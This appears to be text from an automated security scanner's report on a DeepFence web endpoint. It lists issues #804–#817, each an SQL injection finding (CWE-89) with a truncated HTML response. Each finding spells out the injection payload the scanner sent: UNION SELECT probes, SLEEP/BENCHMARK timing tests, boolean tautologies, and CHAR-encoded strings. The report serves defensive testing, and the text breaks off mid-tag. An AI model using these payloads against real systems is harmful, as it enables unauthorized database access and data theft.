src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #804\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #805\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #806\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io /*!10000%201/0%20*/\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #807\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 30#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #808Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #809\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 7300=7300 AND ('pKlZ'='pKlZ\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #810\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io '&&SLEEP(5)&&'1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #811\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 7300=7300 AND ('pKlZ'='pKlY\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #812\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #813\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #814\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.io\"*\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #815\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1)) or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #816\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #817\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 